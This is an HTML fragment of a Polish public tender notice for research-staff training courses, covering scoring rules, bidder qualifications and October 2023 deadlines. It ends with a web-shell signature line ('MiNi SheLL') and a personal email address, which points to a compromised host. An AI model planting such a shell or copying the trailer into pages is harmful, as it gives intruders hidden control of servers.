(w przypadku zaoferowania liczby szkoleń mniejszej niż 5 oferta zostanie odrzucona) <br/>2.	Za 6 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 20 punktów<br/>3.	Za 7 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 30 punktów<br/>4.	Za 8 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 40 punktów<br/><br/>Jako najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów (W+Dt). Łączna liczba punktów możliwych do uzyskania wynosi 100. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Wynik zostanie zaokrąglony do 2 miejsc po przecinku. <br/><br/>15.4.	Zamawiający udzieli zamówienia wykonawcy, którego oferta:<br/>■	odpowiada zasadom określonym w ustawie <br/>■	odpowiada zasadom określonym w Specyfikacji Warunków Zamówienia <br/>■	uzyska najwyższą wartość oceny punktowej „W+Dt” zgodnie z punktem 15.2 i 15.3</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Audyty, inspekcje, kontrole (5 godz.)<br/>Szczegółowy opis przedmiotu zamówienia stanowi: Załącznik Nr 1 – OPIS PRZEDMIOTU ZAMÓWIENIA (OPZ) oraz Załącznik nr 1a- FORMULARZ ASORTYMENTOWO-CENOWY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocena ofert nieodrzuconych, złożonych przez Wykonawców niewykluczonych z postępowania zostanie dokonana wg niżej opisanych zasad.<br/>15.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1. Oferowana cena brutto - 60 %<br/> 2. Doświadczenie trenera – 40%<br/>15.3. Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana według następujących zasad<br/><br/>1.Oferowana cena brutto (60%): <br/>Oferta może uzyskać max. 60 pkt<br/>W - oznacza sumaryczną ilość punktów do dwóch miejsc po przecinku<br/>WCmin – najniższa cena ogółem brutto spośród prawidłowo złożonych i ważnych ofert<br/>WCb – cena ogółem brutto ocenianej oferty.<br/>Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana wg następujących zasad: <br/>W = 60*(WCmin/ WCb) <br/><br/> 2.Doświadczenie trenera – 40% (dla zadania nr 1-5)<br/> W przedmiotowym kryterium oceniana będzie liczba przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w okresie trzech lat przed upływem terminu składania ofert. Ocenie będzie podlegać doświadczenie wyłącznie jednego trenera/wykładowcy, Wykonawca powinien wskazać trenera, który będzie podlegał ocenie.<br/> Maksymalna liczba punktów w ramach kryterium „Doświadczenie trenera” (Dt) wynosi 40. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Punkty za ww. kryterium będzie liczone w następujący sposób: <br/>1.	Za 5 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 0 punktów (w przypadku zaoferowania liczby szkoleń mniejszej niż 5 oferta zostanie odrzucona) <br/>2.	Za 6 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 20 punktów<br/>3.	Za 7 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 30 punktów<br/>4.	Za 8 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 40 punktów<br/><br/>Jako najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów (W+Dt). Łączna liczba punktów możliwych do uzyskania wynosi 100. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Wynik zostanie zaokrąglony do 2 miejsc po przecinku. <br/><br/>15.4.	Zamawiający udzieli zamówienia wykonawcy, którego oferta:<br/>■	odpowiada zasadom określonym w ustawie <br/>■	odpowiada zasadom określonym w Specyfikacji Warunków Zamówienia <br/>■	uzyska najwyższą wartość oceny punktowej „W+Dt” zgodnie z punktem 15.2 i 15.3</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Komunikacja w zespole badawczym. Rozwiązywanie sytuacji konfliktowych <br/>(4 godz.).<br/>Szczegółowy opis przedmiotu zamówienia stanowi: Załącznik Nr 1 – OPIS PRZEDMIOTU ZAMÓWIENIA (OPZ) oraz Załącznik nr 1a- FORMULARZ ASORTYMENTOWO-CENOWY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocena ofert nieodrzuconych, złożonych przez Wykonawców niewykluczonych z postępowania zostanie dokonana wg niżej opisanych zasad.<br/>15.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1. Oferowana cena brutto - 60 %<br/> 2. Doświadczenie trenera – 40%<br/>15.3. Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana według następujących zasad<br/><br/>1.Oferowana cena brutto (60%): <br/>Oferta może uzyskać max. 60 pkt<br/>W - oznacza sumaryczną ilość punktów do dwóch miejsc po przecinku<br/>WCmin – najniższa cena ogółem brutto spośród prawidłowo złożonych i ważnych ofert<br/>WCb – cena ogółem brutto ocenianej oferty.<br/>Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana wg następujących zasad: <br/>W = 60*(WCmin/ WCb) <br/><br/> 2.Doświadczenie trenera – 40% (dla zadania nr 1-5)<br/> W przedmiotowym kryterium oceniana będzie liczba przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w okresie trzech lat przed upływem terminu składania ofert. Ocenie będzie podlegać doświadczenie wyłącznie jednego trenera/wykładowcy, Wykonawca powinien wskazać trenera, który będzie podlegał ocenie.<br/> Maksymalna liczba punktów w ramach kryterium „Doświadczenie trenera” (Dt) wynosi 40. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Punkty za ww. kryterium będzie liczone w następujący sposób: <br/>1.	Za 5 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 0 punktów (w przypadku zaoferowania liczby szkoleń mniejszej niż 5 oferta zostanie odrzucona) <br/>2.	Za 6 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 20 punktów<br/>3.	Za 7 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 30 punktów<br/>4.	Za 8 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 40 punktów<br/><br/>Jako najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów (W+Dt). Łączna liczba punktów możliwych do uzyskania wynosi 100. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Wynik zostanie zaokrąglony do 2 miejsc po przecinku. <br/><br/>15.4.	Zamawiający udzieli zamówienia wykonawcy, którego oferta:<br/>■	odpowiada zasadom określonym w ustawie <br/>■	odpowiada zasadom określonym w Specyfikacji Warunków Zamówienia <br/>■	uzyska najwyższą wartość oceny punktowej „W+Dt” zgodnie z punktem 15.2 i 15.3</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> WARUNKI UDZIAŁU W POSTĘPOWANIU mogą dotyczyć:<br/>1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/><br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Wykonawca/y muszą wykazać, że prowadząc usługi szkoleniowe są wpisani do Rejestru Działalności Instytucji Szkoleniowych<br/><br/>3. sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/><br/>4. zdolności technicznej lub zawodowej <br/>Zamawiający nie stawia warunku w powyższym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. - Wzór oświadczenia stanowi załącznik nr 5 do SWZ<br/><br/>2. Odpis lub Informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualne zaświadczenie o wpisie do Rejestru Instytucji Szkoleniowych (RIS)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca składa wraz z ofertą PRZEDMIOTOWE ŚRODKI DOWODOWE (nie podlegają uzupełnieniu, obligatoryjnie musi być złożone z ofertą, bo stanowi kryterium oceny ofert): <br/><br/> Doświadczenie trenerów - dla kryteriów oceny ofert -Załącznik nr 7 do SWZ (złożyć wraz z ofertą). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie podmiotu udostępniającego zasoby- art. 125 ust.1 Pzp - Załącznik Nr 4 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do Oferty.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>4. Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia została wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców. <br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt 6.1.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-13 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem platformy zakupowej pod adresem: https://dcopih@ezamawiający.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-13 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com